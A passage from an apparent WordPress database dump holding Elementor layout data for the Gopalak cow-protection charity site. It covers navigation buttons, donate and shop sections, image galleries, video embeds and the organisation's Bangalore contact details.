mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11667,1935,'_elementor_page_assets','a:0:{}'),(11670,1936,'_elementor_edit_mode','builder'),(11671,1936,'_elementor_template_type','wp-page'),(11672,1936,'_elementor_version','3.7.8'),(11673,1936,'_wp_page_template','elementor_canvas'),(11674,1936,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 